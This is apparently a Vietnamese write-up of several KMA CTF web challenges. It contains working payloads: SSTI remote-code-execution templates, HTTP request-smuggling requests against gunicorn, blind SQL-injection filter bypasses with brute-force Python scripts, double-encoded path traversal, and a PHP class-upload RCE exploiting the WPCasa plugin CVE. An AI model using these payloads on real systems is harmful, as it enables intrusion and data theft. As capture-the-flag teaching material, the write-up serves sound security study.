KMA CTF :#

Writeup KMA CTF (Web exploitation)

YDSYD :#

Bài này server cho user admin có isAdmin : true sẵn rồi. Ở endpoint /login ko có sự filter nào về user admin

Vậy chỉ cần login vào với user là admin là đã có token JWT và get flag thôi.

1
POST /login HTTP/2
2
Host: ydsyd.wargame.vn
3
Content-Type: application/json
4
Content-Length: 16
5

6
{"user":"admin"}

Và chỉ cần gắn cookie vào, POST tới annyeong là đã được flag :

1
POST /annyeong HTTP/2
2
Host: ydsyd.wargame.vn
3
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiYWRtaW4iLCJpc0FkbWluIjp0cnVlLCJpYXQiOjE3NTkwNDMyMzAsImV4cCI6MTc1OTA0NjgzMH0.9Aeue-p_znn_7PGm7SOoPDqm1Ryq5Ds2z86GF-UtqJI
4
Content-Type: application/json
5
Content-Length: 2
6

7
{}

FLAG : KMACTF{Y1u__50lv3d_Y0u_L1ved??<3}

ACL and H1 :#

Unintend :#

Challenge này có vuln SSTI ở /render

Nhận filepath sau đó sẽ read file và render_template_string với nội dung file. Và cho chúng ta upload file, nó sẽ random name sau đó save vào uploads

Hàm allow_file sẽ check file coi có phải là txt hoặc html hay không.

Và challenge này sử dụng gunicorn làm sv proxy. config :

1
map /render http://gunicorn-server:8088/internal @action=deny @method=post @method=get
2
map / http://gunicorn-server:8088/

Thì nó sẽ chặn rq tới /render http://gunicorn-server:8088/internal với method post hoặc get.

Thì /render chính là chỗ chúng ta cần truy cập để trigger SSTI Thì gunicorn có CVE Http Requests Smuggling nhưng ở biên bản thấp hơn, mà author sử dụng gunicorn==23.0.0 nên phải tìm cách bypass khác.

Để ý thì author dùng map /render Vậy sẽ ra sao khi chúng ta encode endpoint đó và gửi lên sv. Khi gửi rq bình thường : Encode :

Vậy là đã truy cập được , bây giờ upload file chứa payload SSTI RCE để get flag thôi :

1
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat /*').read() }}

Sau khi upload thì đã được path : See all file : Render + url encoding :

Flag : KMACTF{HTTP/1.1_Must_Di3_or_Not?????}

Intend :#

https://w4ke.info/2025/06/18/funky-chunks.html

Bài blog này phân tích cho chúng ta cách lợi dụng kí tự kết thúc dòng (\r,\n) để gây HTTP Requests Smuggling. Bài viết này phân tích 4 vector attack : TERM.EXT,EXT.TERM,TERM.SPILL,SPILL.TERM nhưng mà chủ yếu áp dụng TERM.EXT và EXT.TERM Đầu tiên để hiểu thì chúng ta cần tìm hiểu Chunk extensions trước.

Trong HTTP/1.1, khi một rq được gửi với Transfer-Encoding: chunked, dữ liệu được chia thành nhiều chunk. Mỗi chunk có cú pháp như sau :

1
<chunk-size>[;<chunk-extension>]\r\n
2
<chunk-data>\r\n

chunk-size là độ dài dữ liệu, nó được tính theo hex
chunk-data là data.
chunk-extension là phần chunk mở rộng, nó ở sau dấu ; (có hay không cũng được.)

chunk-extension có tác dụng cung cấp metadata cho chunk (signature hoặc hash)

Và trong thực tế thì hầu như không có server/client nào sử dụng chúng. Các trình parse thường hay bỏ qua nó.

NOTE
Vì chunk-extension không được sử dụng phổ biến và rộng rãi nên là các trình parse triển khai HTTP có thể sẽ không tuân thủ chuẩn về các quy tắc của nó. (Có thể gọi là làm cho có)

Và chúng ta lợi dụng sự mơ hồ về parse chunk-extension để chèn các kí tự end line.

Ví dụ chúng ta chèn \n vào bên trong chunk-extension thì trình parse sẽ có 3 lựa chọn :

Bỏ qua \n và parse bình thường để tìm \r\n (terminator). Và nó đã vi phạm quy tắc RFC (Do kí tự này không được cho phép trong chunk-extension )
Hiểu nó như một kí tự end line : Lúc này thì trình parse nó sẽ end cái chunk-header (chunk-extension nằm trong header) và bắt đầu parse chunk-body
Throw lỗi. Cách này là an toàn nhất.

Vậy thì chúng ta cần lợi dụng lựa chọn 1 và 2 để Smuggling nếu proxy chọn cách 1 và server chọn cách 2 và ngược lại.

TERM.EXT (Terminator trong Extension)#

Cách này là proxy hiểu là kí tự end line và server không hiểu. Chúng ta có thể thấy proxy nhận \n ở sau dấu ; (chunk header) là dấu kết thúc dòng. Lúc này proxy sẽ parse chunk body và khi hết 2 byte kí tự thì xuống chunk header khai báo có 45 byte body -> parse hết 45 byte rồi tìm 0\r\n để end request TE.

Còn bên server, server không nhận \n là kí tự kết thúc dòng. Sẽ đi tìm \r\n để kết thúc chunk header. Sau đó 45 sẽ là chunk body, 0\r\n\r\n sẽ kết thúc requests của TE.

Và request mới đã được tạo ra.

EXT.TERM :#

Thì biến thể này ngược lại, proxy ko hiểu end line \n còn server lại hiểu.

Ta có thể thấy chunk header khai báo 45 byte (hex) và ; để mở chunk extension , chèn \n vào , proxy không nhận và nó sẽ tìm \r\n chính thức để end chunk header. Sau đó chunk body sẽ được parse 45byte hex.

Còn bên server, Nó hiểu \n là end line nên sẽ dừng chunk header sau đó chunk body sẽ kéo dài 45 byte hex và kết thúc với 0\r\n\r\n và requests thứ 2 sẽ được tạo ra.

solve :#

tác giả có bảo gunicorn có bị TERM.EXT nên là chúng ta có thể test bằng TERM.EXT (Lỗ hổng đã được biết đến và đang chờ fix.) Vì là TERM.EXT nên là proxy nhận \n là end line còn server ko nhận. Nên sẽ viết payload như sau :

1
GET / HTTP/1.1\r\n
2
Host: localhost:8188\r\n
3
Connection: keep-alive\r\n
4
Transfer-Encoding: chunked\r\n
5
\r\n
6
2;\n
7
cc\r\n
8
54\r\n
9
0\r\n
10
\r\n
11
GET /admin HTTP/1.1\r\n
12
Host: localhost:8088\r\n
13
Transfer-Encoding: chunked\r\n
14
\r\n
15
0\r\n
16
\r\n

Check trong console của docker thì nó có báo ERROR - 404 Error: Path '/admin' not found Vậy là đã smugg thành công. Vì request smugg được server xử lí và chỉ response request / đầu tiên nên là tìm cách leak flag bằng OOB. Nhưng mà do server docker không có các command OOB đơn giản rồi nên là có thể dùng route này để read flag payload SSTI :

1
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('mkdir /app/uploads/flag_ccmm && cat /flag* > /app/uploads/flag_ccmm/ccc.txt').read() }}

upload : uploads/055a1dc947e94d49a55705f8634b84ec/5553a10c3dae4096.txt

Smugg render : get flag :

payload cho bạn nào muốn test :

1
GET / HTTP/1.1\r\n
2
Host: 165.22.55.200:50001\r\n
3
Connection: keep-alive\r\n
4
Transfer-Encoding: chunked\r\n
5
\r\n
6
2;\n
7
cc\r\n
8
96\r\n
9
0\r\n
10
\r\n
11
GET /render?filepath=uploads/055a1dc947e94d49a55705f8634b84ec/25ab8e8364d04222.txt HTTP/1.1\r\n
12
Host: localhost:8088\r\n
13
Transfer-Encoding: chunked \r\n
14
\r\n
15
0\r\n
16
\r\n

Flag : KMACTF{HTTP/1.1_Must_Di3_or_Not?????}

vibe_coding :#

Challenge này có 2 service là nodejs và python

Service python chứa flag và được return khi call process_action với username là admin và action là readFlag

Ở endpoint /execute (Đã rút gọn code) Thì sẽ nhận POST tới và get username,request_id ,action từ request.form.get('...').strip()

1
@app.route('/execute', methods=['POST'])
2
def execute_handler():
3
    try:
4
        username = request.form.get('username', '').strip()
5
        request_id = request.form.get('requestid', '').strip()
6
        action = request.form.get('action', '').strip()
7

8
        if not username or not request_id or not action:
9
            return send_error_response(
10
                "Missing required fields",
11
                "username, requestid, and action are required",
12
                400
13
            )
14

15
            ...
16

17
        return jsonify(response), 200
18

19
    except Exception as e:
20
            ...

hàm .strip() sẽ xoá space ở đầu và ở cuối của variable. Service python chỉ cho phép local, ko mở port ra bên ngoài.

Service nodejs

1
app.post('/register', async (req, res) => {
2
    const { username, password } = req.body;
3

4
    if (!username || !password) {
5
        return res.status(400).json({
6
            error: 'Username and password are required'
7
        });
8
    }
9

10
    if( typeof username !== 'string' || typeof password !== 'string' ) {
11
        return res.status(400).json({
12
            error: 'Username and password must be strings'
13
        });
14
    }
15

16
    // Validate username length (must be > 5 characters)
17
    if (username.length <= 5) {
18
        return res.status(400).json({
19
            error: 'Username must be longer than 5 characters'
20
        });
21
    }
22

23
    if (users[username]) {
24
        return res.status(400).json({
25
            error: 'User already exists'
26
        });
27
    }
28

29
    try {
30
        const hashedPassword = await bcrypt.hash(password, 10);
31
        users[username] = {
32
            username,
33
            password: hashedPassword,
34
            createdAt: new Date().toISOString()
35
        };
36

37
        res.json({
38
            message: 'User registered successfully',
39
            username: username,
40
            hint: 'Now you can login to get JWT token'
41
        });
42
    } catch (error) {
43
        res.status(500).json({
44
            error: 'Registration failed',
45
            message: error.message
46
        });
47
    }
48
});

Endpoint này cho register, check users[username] xem nếu có báo user đã tồn tại hoặc lỗi thì return failed

Còn /action sẽ get data từ requests của user. Sau đó sẽ gửi về server python /execute :

Để ý thì register, login sẽ ở bên service nodejs. Còn khi action qua service của python thì nó sẽ nhận data và .strip() Ý tưởng :

Chúng ta có thể lợi dụng điều này để reg username admin (có space ở 2 đầu) để register và login. Sau đó khi server nodejs forward qua server python thì sẽ strip và chúng ta đã được user là admin trong requests tới /execute.

1
POST /register HTTP/1.1
2
Host: 165.22.55.200:50004
3
Connection: keep-alive
4
Content-Type: application/json
5
Content-Length: 43
6

7
{"username":"  admin ","password":"duc193"}

1
POST /login HTTP/1.1
2
Host: 165.22.55.200:50004
3
Connection: keep-alive
4
Content-Type: application/json
5
Content-Length: 43
6

7
{"username":"  admin ","password":"duc193"}

Get flag :

1
POST /action HTTP/1.1
2
Host: 165.22.55.200:50004
3
Connection: keep-alive
4
Content-Type: application/json
5
Authorization: Beaber eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IiAgYWRtaW4gIiwiaWF0IjoxNzU5MDU4NjgxLCJleHAiOjE3NTkxNDUwODF9.YlixecXi8vByAOr-xZSGv7b1uXQD7lPldoGwvQRFHaM
6
Content-Length: 21
7

8
{"action":"readFlag"}

flag : KMACTF{how_can_you_pollute_param_@@_}

Data Lost Prevention :#

Challenge này cho chúng ta 1 trang web như sau :

Để ý vào chức năng search và chức năng export. Đầu tiên thì phải xác định flag nằm ở đâu đã :

Thì đoạn code này sẽ check coi trong attachments có is_lost=1 trong db chưa, có r thì out. Chưa có thì sẽ gen uuidv4 rename file flag và gắn vào path /var/data/flags. Sau đó sẽ add vào table attachments với filename là Q2-incident-raw.csv và storage_path là path tới file flag vừa gen.

/api/search.php :

Đoạn này có dính vuln SQL Injection do chèn $filtered vào payload sql. Dù đã qua filter nhưng vẫn k an toàn.

$q2 = preg_replace('/\s+/u', '', $q); đoạn này sẽ filter và replace các khoảng trắng. Bao gồm space,tab,\n,...
$q2 = preg_replace('/\b(?:or|and)\b/i', '', $q2); dòng này sẽ replace or và and (không phân biệt viết hoa hay thường.). Lưu ý là do có \b nên là chỉ có or hoặc and đứng một mình mới bị replace. Nên là ko thể bypass bằng cách dùng oorr hay anandd. Nhưng mà có thể dùng ||,&& thay cho or và and.
$q2 = str_ireplace(["union","load_file","outfile","="], '', $q2); Hàm này chỉ đơn giảnn là replace các kí tự nếu có trong chuỗi (Ko phân biệt Hoa, thường). Và lưu ý là chuỗi sau khi replace xong sẽ được check strlen dưới 90 kí tự mới cho phép query

Đây là payload gốc :

1
$sql = "SELECT id,title FROM cases WHERE title RLIKE '.*$filtered' AND owner_id = :uid LIMIT 1";

Thì chỉ trả về json (bool)$row nên chúng ta cần query blind boolean để trả về row hoặc ko. Vậy cần payload ngắn mà đáp ứng được điều kiện trên : Sau một hồi fuzz thử thì được payload như sau :

payload :

1
-'union select 1,1 FROM(attachments)where substr(storage_path,1,1)like'/'#

(-' để làm cho nó return sai vế trước.) Sau đó dùng union để select 2 row và get storage_path từ attachments, sau đó substring để bruteforce từng kí tự.

Bypass filter :

Vì union bị filter nên có thể chèn unio=n để khi nó replace = sẽ còn chuỗi union.
Bypass filter space bằng /**/
Đoạn FROM(attachments) thì dùng cách này để khỏi phải dùng /**/FROM/**/attachments/**/ để payload ngắn hơn.
Đoạn substring(storage_path,1,1)like'/'# viết liền để hạn chế dùng space (Nhưng mà nó vẫn chạy được.)

Thay /**/ vào payload :

1
-'union/**/select/**/1,1/**/FROM(attachments)where/**/substr(storage_path,1,1)like'/'#

Được payload 86 kí tự, hợp lí rồi. Script Brute tên file :

1
import requests
2
base_url = "https://dlp.wargame.vn/api/search.php?q="
3
cookies = {"PHPSESSID": "d005006fea64b1d184298adaaf03502e"}
4
headers = {"Connection": "keep-alive"}
5
file = "/var/data/flags/flag_2986112"
6
# Cho _ ở cuối bởi vì chúng ta dùng LIKE nó sẽ luôn true khi có _ (Có thể dùng để check length)
7
# Nhưng mà do name flag không có `_` nên là thôi bỏ cũng được.
8
CHARSET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789/.-{}_"
9
def gen_payload(index,ch):
10
    sql  = f"-'uni%3don%2f**%2fselect%2f**%2f1%2c1%2f**%2fFROM(attachments)where%2f**%2fsubstr(storage_path%2c{index}%2c1)like'{ch}'%23"
11
    return sql
12
for i in range(27,100):
13
    for ch in CHARSET:
14
        payload = gen_payload(i,ch)
15
        url = base_url + payload
16
        a = requests.get(url)
17
        if "true" in a.text:
18
            file += ch
19
            break
20
    print(file)

Do trên server hơi lag nên GPT để script đa luồng cho nhanh :

1
import requests
2
from concurrent.futures import ThreadPoolExecutor, as_completed
3
import threading
4
import time
5

6
base_url = "https://dlp.wargame.vn/api/search.php?q="
7
cookies = {"PHPSESSID": "d005006fea64b1d184298adaaf03502e"}
8
headers = {"Connection": "keep-alive", "User-Agent": "Mozilla/5.0 (ctf-bruter)"}
9
CHARSET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789/.-{}"
10

11
file_path = ""
12

13
MAX_WORKERS = 10
14
REQUEST_TIMEOUT = 8
15
RETRY = 2
16
SLEEP_BETWEEN_INDEX = 0.05
17

18
def gen_payload(index, ch):
19
    sql  = f"-'uni%3don%2f**%2fselect%2f**%2f1%2c1%2f**%2fFROM(attachments)where%2f**%2fsubstr(storage_path%2c{index}%2c1)like'{ch}'%23"
20
    return sql
21

22
def probe_char(session: requests.Session, index: int, ch: str) -> bool:
23
    url = base_url + gen_payload(index, ch)
24
    tries = 0
25
    while tries <= RETRY:
26
        try:
27
            r = session.get(url, cookies=cookies, headers=headers, timeout=REQUEST_TIMEOUT, allow_redirects=False)
28
            if "true" in r.text:
29
                return True
30
            return False
31
        except requests.RequestException:
32
            tries += 1
33
            time.sleep(0.2)
34
    return False
35

36
def find_char_at_index(session: requests.Session, index: int) -> str | None:
37
    found_event = threading.Event()
38
    found_char = None
39
    with ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
40
        futures = {executor.submit(probe_char, session, index, ch): ch for ch in CHARSET}
41

42
        try:
43
            for fut in as_completed(futures):
44
                ch = futures[fut]
45
                try:
46
                    ok = fut.result()
47
                except Exception:
48
                    ok = False
49
                if ok:
50
                    found_char = ch
51
                    found_event.set()
52
                    break
53
        finally:
54
            pass
55

56
    return found_char
57

58
def main():
59
    global file_path
60
    start = 1
61
    end = 100
62

63
    with requests.Session() as session:
64
        for i in range(start, end):
65
            ch = find_char_at_index(session, i)
66
            if ch is None:
67
                print(f"[{i}] No char found -> stopping.")
68
                break
69
            file_path += ch
70
            print(f"[{i}] found: {ch} -> {file_path}")
71
            time.sleep(SLEEP_BETWEEN_INDEX)
72

73
    print("Done. Final:", file_path)
74

75
if __name__ == "__main__":
76
    main()

Nhớ thay cookie vào chạy chứ không bị lỗi. Được tên flag :

/var/data/flags/flag-2986112f-ec04-4d17-b80a-6a60a00a95da.txt

Bên export.php Thì sẽ check while nếu có ../ sẽ replace thành "" (Không thể dùng ..././) vì nó có đệ quy) Để ý thì nó có urldecode nên chúng ta có thể encoding 2 lần gửi lên để bypass qua filter. 2 lần do 1 lần server tự decode, lần thứ 2 là do code.

path traversal về :

../../data/flags/flag-2986112f-ec04-4d17-b80a-6a60a00a95da.txt double url encode : ..%252f..%252fdata%252fflags%252fflag-2986112f-ec04-4d17-b80a-6a60a00a95da.txt

Flag : KMACTF{i'M_bL1nd_bUt_u_'r3_Sm4rZZZZ}

CVE-2025-93XX :#

Challenge này author cho chúng ta 1 file WordPress : Sau khi dựng local lên thì vào page admin. Thì challenge WP thường đa số sẽ target vào plugin WP. Nên là check thử Plugin trong wp-admin : (Ở đây mình tự active 2 plugin) Vậy là có 2 plugin là Safe PHP Class Upload (read-only, non-executable) version 0.1 (author meulody tên author challenge này ) và WPCasa version 1.4.1

Khi search thử thì thấy có CVE của wpcasa https://zeropath.com/blog/cve-2025-9321-wpcasa-wordpress-plugin-code-injection-summary

CVE 2025-9321 Tóm tắt thì plugin WPCasa có chứa lỗ hổng Code Injection cho phép attacker call hàm api_requests nằm ở file includes/class-wpsight-api.php và có thể dẫn tới RCE. Do không WhiteList, filter blacklist input nên dẫn tới việc attacker có thể tấn công vào và RCE.

Vì CVE này mới ra được 6 ngày nên chưa có PoC (1day).

Mở thử file đó lên xem như nào đã : Khi khởi tạo class nó sẽ chạy __construct()

add_filter( 'query_vars', array( $this, 'add_query_vars'), 0 ); : thêm biến query wpsight-api vào danh sách query_vars của WordPress.
add_action( 'parse_request', array( $this, 'api_requests'), 0 ); : Hook vào quá trình parse request để xử lý khi có request tới endpoint API.
function add_query_vars( $vars ) : Mở rộng query vars của WordPress để chấp nhận tham số ?wpsight-api=... trên URL.

Hàm api_requests sẽ có flow như sau :

Nếu tồn tại $_GET['wpsight-api'] → gán vào $wp->query_vars['wc-api'].
Sau đó check nếu có $wp->query_vars['wc-api'] sẽ ob_start() Hàm này sẽ không cho script nếu được chạy in ra output ra ngoài. Đây là lí do tại sao khi gọi echo nó không in ra.
Tiếp tục sẽ gắn $api từ wpsight-api lowercase. Sau đó nếu tồn tại class thì khởi tạo class đó. với new $api()

Ban đầu thì ý tưởng là tìm sink để RCE nhưng mà không được, do chỉ cho mỗi reg new Class, không cho truyền j vào. Sau thì nghĩ lại thấy plugin upload của author : Đầu tiên sẽ khởi tạo và add_action('rest_api_init', function () để nhận rq post tới.

flow sẽ như sau : Nhận file -> check coi nếu file có size > 64 byte thì throw lỗi. -> read file và check phải có Class ... -> sau đó sẽ check xem chúng ta có sử dụng hàm bị cấm không.

Rồi mới save vào file .txt Câu hỏi đặt ra là save vào file txt thì làm sao mà dùng Class này để có thể trigger CVE được.

Để tìm hiểu rõ hơn thì CTRL SHIFT F uploads_safe_classes Và chúng ta đã tìm thấy author đã sửa đoạn code này để include file txt vào.

Và đoạn code này nằm trong hàm __construct của class WPSight_Framework Lệnh wpsight(); ở cuối file được gọi mỗi lần WordPress load plugin này. Trong function đó, nếu biến global $wpsight chưa tồn tại, nó sẽ new WPSight_Framework() và sẽ làm load constructor.

NOTE
Mà mỗi lần truy cập web thì wp sẽ load plugin cho chúng ta, vậy chúng ta có thể coi như server luôn trigger include file txt.

Vậy thì upload sẽ ở endpoint nào : Thì nó sẽ add_action vào rest_api_init nên là mình tìm thấy docs : https://developer.wordpress.org/rest-api/extending-the-rest-api/adding-custom-endpoints/

Vậy là chúng ta có thể gọi upload bằng query : ?rest_route=/safe-upload/v1/upload

Upload thành công.

Vậy giờ tìm cách để rce, bypass filter và size 64byte.

Thì trong magic method của PHP có function magic method __construct là hàm sẽ được chạy khi chúng ta khởi tạo 1 object.

Vậy thì chúng ta có thể lợi dung nó với cách gọi hàm $a($b) để RCE. (Dùng payload này là do nó ngắn để ko bị dính quá 64 kí tự) hoặc có thể dùng include($_GET[1]) và kết hợp với php filter chain.

Ví dụ :

Và để control thì chúng ta có thể dùng $_GET[1]($_GET[2]) để truyền tham số vào bằng requests.

payload :

1
<?php class cc{function __construct(){$_GET[1]($_GET[2]);}}

upload :

1
curl -X POST "http://localhost:8082/?rest_route=/safe-upload/v1/upload" -F "file=@123.txt"

1
GET /?wpsight-api=cc&1=system&2=ls HTTP/1.1
2
Host: localhost:8082
3
Connection: keep-alive

Vì nó luôn die(1) nên phải blind exploit. get Flag bằng cách copy file flag.php ra /var/www/html

cat /var/www/html/flag* |base64 > /var/www/html/duc193_xxxxxx.txt Được flag local :

Flag server :

Flag : KMACTF{Y3s_it's__1dayupload_php_class_4nd_ex3cut3_it_⚆_⚆}